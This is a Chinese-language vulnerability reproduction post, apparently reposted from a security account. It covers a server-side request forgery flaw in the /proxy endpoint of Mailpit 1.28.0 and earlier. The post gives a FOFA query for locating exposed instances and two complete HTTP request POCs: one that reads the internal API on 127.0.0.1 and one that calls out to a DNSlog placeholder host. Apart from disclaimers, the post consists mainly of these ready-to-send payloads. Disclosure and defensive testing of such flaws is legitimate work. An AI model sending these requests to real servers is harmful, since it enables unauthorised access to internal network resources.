漏洞复现||Mailpit服务端请求伪造

admin 2026-01-23 10:36:09 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文披露了Mailpit1.28.0及之前版本存在的服务端请求伪造漏洞,攻击者可利用/proxy端点未授权访问内网资源。文中提供了FOFA资产检索语法及包含回显验证和Dnslog外带检测的POC代码,旨在帮助安全人员快速定位并复现该漏洞。 综合评分: 75 文章分类: 漏洞复现,漏洞POC,WEB安全


cover_image

漏洞复现 || Mailpit服务端请求伪造

韩文庚 韩文庚

我爱林

2026年1月22日 22:22 北京

免责声明

我爱林攻防研究院的技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

      Mailpit是一款电子邮件测试工具,Mailpit在1.28.0及之前版存有漏洞,该漏洞源于/proxy端点服务端请求伪造,允许攻击者未授权访问内部网络资源。

资产确定

fofa: "Mailpit"

漏洞复现

1.利用如下POC执行得到回显

GET /proxy?url=http://127.0.0.1:8025/api/v1/info HTTP/1.1Host: {{hostname}}Cache-Control: max-age=0Accept-Language: en-US,en;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: keep-alive

2.利用如下POC执行Dnslog外带得到请求

GET /proxy?url=http://[dnslog地址] HTTP/1.1Host: {{hostname}}Cache-Control: max-age=0Accept-Language: en-US,en;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: keep-alive

如有侵权,请联系删除

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:我爱林 韩文庚 韩文庚《漏洞复现 || Mailpit服务端请求伪造》

评论:0   参与:  0